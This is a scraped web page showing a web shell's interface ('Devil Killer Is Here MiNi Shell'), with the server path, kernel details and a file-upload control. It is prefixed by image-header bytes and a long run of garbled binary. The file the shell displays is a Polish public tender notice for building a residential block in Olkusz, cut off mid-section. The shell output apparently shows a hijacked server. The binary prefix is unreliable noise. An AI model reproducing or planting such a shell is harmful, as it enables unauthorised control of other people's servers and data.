JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231013/0044437101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa budynku mieszkalnego wielorodzinnego wraz z infrastrukturą towarzyszącą w Olkuszu przy ul.Dworskiej <br/>i Kolejowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Olkuskie Towarzystwo Budownictwa Społecznego Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 357233182</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Króla Kazimierza Wielkiego 61</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olkusz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/6430251</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">olkuskitbs@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.otbs.olkusz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa budynku mieszkalnego wielorodzinnego wraz z infrastrukturą towarzyszącą w Olkuszu przy ul.Dworskiej <br/>i Kolejowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c724417d-68c2-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00444371</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c724417d-68c2-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu<br/>&#34;Wykonawca&#34; na platformie e-zamówienia.<br/>3. Komunikacja w postępowaniu z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce &#34;Formularze&#34; (&#34;Formularze do komunikacji&#34;). Za pośrednictwem &#34;Formularzy do komunikacji&#34;<br/>odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. &#34;Formularze do<br/>komunikacji&#34; umożliwiają również dołączenie załącznika do przesłanej wiadomości.<br/>4. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie<br/>e-Zamówienia):<br/>https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-c724417d-68c2-11ee-9aa3-96d3b4440790<br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/ konkursy”).<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/>ocds-148610-c724417d-68c2-11ee-9aa3-96d3b4440790<br/>6.Pozostałe wymagania techniczne i organizacyjne zawarte w ust. 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Uprzejmie informujemy, że Olkuskie Towarzystwo Budownictwa Społecznego Sp. z o.o. z<br/>siedzibą w Olkuszu ul. Kr. K. Wielkiego 61; NIP 637 19 30 624 (dalej: OTBS) przetwarza dane osobowe zgodnie z rozporządzeniem Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (RODO) oraz ustawą z dn. 10.05.2018 r. o ochronie danych osobowych (Dz.U. 2018, poz. 1000).<br/>W świetle powyższego zgodnie z art. 13 ust. 1 i ust. 2 oraz art. 14 ust. 1 i ust. 2 RODO informuję że:<br/>1) Administratorem Państwa danych osobowych jest Olkuskie Towarzystwo Budownictwa Społecznego Sp. z o.o. z siedzibą w<br/>Olkuszu ul. Kr. K. Wielkiego 61; NIP 637-19-30-624<br/>Z Administratorem możecie się Państwo kontaktować drogą e-mailową pod adresem e-mail: olkuskitbs@gmail.com, za pomocą<br/>poczty tradycyjnej na adres: ul. Kr. K. Wielkiego 61, 32-300 Olkusz, bądź osobiście pod adresem ul. Kr. K. Wielkiego 61, 32-300<br/>Olkusz.<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego „Budowa budynku mieszkalnego wielorodzinnego wraz z infrastrukturą<br/>towarzyszącą w Olkuszu przy ul. Dworskiej i Kolejowej”. Oznaczenie sprawy (numer referencyjny): OTBS-ZP-2/2023,<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t. j. Dz. U. z 2018 r. poz. 1986 ze<br/>zm.)., dalej „ustawa Pzp”;<br/>4) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 rozporządzenia 2016/679;<br/>7) posiada Pani/Pan:<br/>a) na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych Pani/Pana dotyczących; OTBS-ZP-2/2023<br/>b) na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania Pani/Pana danych osobowych ;<br/>c) na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy rozporządzenia 2016/679;<br/>8) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>c) na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">załącznik nr 13 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OTBS-ZP-2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest:<br/>Przedmiot zamówienia obejmuje kompleksową budowę budynku mieszkalnego wielorodzinnego (pod klucz) liczącego 36<br/>lokali mieszkalnych i 18 miejsc postojowych w garażach indywidualnych wraz z niezbędną infrastrukturą techniczną tj.<br/>zewnętrzną instalacją wody, kanalizacji sanitarnej, deszczowej, prądu, budową miejsc postojowych, wykonaniem<br/>oświetlenia zewnętrznego, budową ciągu pieszo jezdnego, przekładką kabla teletechnicznego w Olkuszu przy ul. Dworskiej i<br/>Kolejowej, zgodnie z dokumentacją techniczną, obowiązującymi warunkami technicznymi, przepisami dozoru technicznego,<br/>prawem budowlanym oraz bieżącymi zaleceniami inspektora nadzoru.<br/>Lokalizacja: Olkusz, ul. Dworska, ul Kolejowa dz. nr 4991/2, 4991/1, 2434, 3157/2<br/>Zakres przedmiotu zamówienia obejmował będzie m.in.:<br/>- wykonanie robót przygotowawczych<br/>- wykonanie robót budowlanych i montażowych zgodnie z dokumentacją posiadaną przez Zamawiającego,<br/>- wykonanie zewnętrznych instalacji dla przyłączy zgodnie z dokumentacją posiadaną przez Zamawiającego oraz zgodnie z<br/>zasadami określonymi w warunkach przyłączenia wydanych przez dostawców mediów.<br/>- prowadzenie bieżącej obsługi geodezyjnej oraz sporządzenie inwentaryzacji powykonawczej w 2 egzemplarzach,<br/>- wykonanie i zatwierdzenie dokumentacji zamiennej w przypadku wprowadzenia zmian w trakcie realizacji przedmiotu<br/>zamówienia,<br/>- sporządzenie świadectwa charakterystyki energetycznej budynku,<br/>- sporządzenie inwentaryzacji budowlanej budynku objętego inwestycją<br/>- uzyskanie wszystkich niezbędnych decyzji, opinii, niezbędnych do uzyskania przez zamawiającego prawomocnej decyzji<br/>pozwolenia na użytkowanie budynku objętego inwestycją<br/>-wykonanie innych robót i prac niezbędnych do należytego wykonania przedmiotu zamówienia.<br/>Ogólna charakterystyka projektowanego budynku i dane techniczne:<br/>Budynek mieszkalny wielorodzinny, składający się z dwóch oddylatowanych segmentów, posiadający 4 kondygnacje<br/>nadziemne, jedną kondygnację podziemną w której zaprojektowano garaże indywidualne oraz komórki lokatorskie. Dach<br/>wielospadowy.<br/>Dane powierzchniowe budynku (z opisu dokumentacji):<br/>- powierzchnia użytkowa mieszkań (PUM) 1952,18 m²<br/>- powierzchnia użytkowa pomocnicza (w tym garaże ) 509,20 m²<br/>- powierzchnia ruchu 257,24 m²<br/>- powierzchnia netto 2718,62 m²<br/>- powierzchnia zabudowy 737,54 m²<br/>- kubatura 9820,00 m³<br/>- maksymalne wymiary zewnętrzne budynku 41,45m x 24,90m<br/>- maksymalna wysokość budynku 15,00 m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45211340-4 - Roboty budowlane w zakresie budownictwa wielorodzinnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45223300-9 - Roboty budowlane w zakresie parkingów</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45232310-8 - Roboty budowlane w zakresie linii telefonicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt 21 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilośc płatności przejściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O zamówienie ubiegać się mogą Wykonawcy którzy:<br/>1.1. Nie podlegają wykluczeniu<br/>1.1.1. Z postępowania o udzielenie zamówienia wyklucza się wykonawcę w okolicznościach określonych w art. 108 ust.1 Pzp .<br/>1.1.2. Na podstawie art. 109 Pzp Zamawiający wykluczy wykonawcę w przypadkach określonych w Art. 109 ust 1 pkt 1, pkt<br/>4, pkt 8, pkt 9, pkt 10,<br/>1.1.3. Art. 7 ust 1 ustawy z 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Względem Wykonawcy podlegającego wykluczeniu w<br/>tym zakresie, stosuje się art.7 ust 3 wspomnianej ustawy.<br/>1.1.4. Zgodnie z art. 110 Pzp Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania<br/>o udzielenie niniejszego zamówienia.<br/>1.2. Spełniają warunki udziału w postępowaniu określone przez Zamawiającego:<br/>1.2.1. W zakresie warunków dotyczących zdolności technicznej lub zawodowej o udzielenie zamówienia ubiegać się mogą<br/>wykonawcy, którzy:<br/>1.2.1.1. Dysponują co najmniej po jednej osobie uprawnionej, zgodnie z wymogami ustawy Prawo budowlane (tekst jedn.:<br/>Dz.U. z 2023r. poz. 682) do pełnienia samodzielnych funkcji technicznych w budownictwie tj. kierownika:<br/>1.2.1.1.1. budowy o specjalności: konstrukcyjno-budowlanej lub równoważnej, który legitymuje się doświadczeniem zawodowym- tj. kierował minimum 2 (słownie: dwa) budowami w zakresie budynku mieszkalnego wielorodzinnego, budynku mieszkalno- usługowego lub budynku użyteczności publicznej o kubaturze min 7000 m3 każda<br/>1.2.1.1.2. robót o specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub<br/>równoważnej,<br/>1.2.1.1.3. robót o specjalności: instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych lub równoważnej,<br/>1.2.1.2. Wykażą że wykonali należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, minimum 2 (słownie: dwa) roboty budowlane wielobranżowe<br/>(zawierające branże elektryczną, budowlaną, sanitarną w tym wentylacja mechaniczna, drogową) w zakresie budowy<br/>budynku mieszkalnego wielorodzinnego, budynku mieszkalno- usługowego lub budynku użyteczności publicznej wartości co<br/>najmniej 6 000 000,00 zł brutto każda.<br/>W przypadku, gdy jakakolwiek wartość dotycząca ww. warunku wyrażona będzie w walucie obcej, Zamawiający przeliczy tą<br/>wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia<br/>publicznego (za datę wszczęcia postępowania Zamawiający uznaje datę umieszczenia ogłoszenia o zamówieniu w miejscu<br/>publicznie dostępnym w swojej siedzibie oraz na stronie internetowej). Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania<br/>1.2.2. W zakresie warunków dotyczących sytuacji ekonomicznej lub finansowej o udzielenie zamówienia ubiegać się mogą<br/>wykonawcy, którzy:<br/>1.2.2.1. posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 6 000 000,00 zł<br/>1.2.2.2. posiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż 4 000 000,00 zł<br/>1.2.3. Zamawiający nie określa warunków udziału w postępowaniu w zakresie dotyczącym zdolności do występowania w obrocie gospodarczym,<br/>1.2.4. Zamawiający nie określa warunków udziału w postępowaniu w zakresie dotyczącym uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>1.3. Zgodnie z art. 118 Pzp Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu o<br/>udzielenie zamówienia publicznego, w stosownych sytuacjach oraz w odniesieniu do przedmiotowego zamówienia, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od<br/>charakteru prawnego łączących go z nim stosunków prawnych.<br/>1.3.1. W odniesieniu do warunków dotyczących doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonują usługi, do realizacji których te zdolności są wymagane.<br/>1.3.2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>1.3.3. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa powyżej w pkt. 1.3.2 , potwierdza, że stosunek<br/>łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1.3.3.1. Zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>1.3.3.2. Sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>1.3.3.3. Czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu<br/>do warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>1.3.4. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub 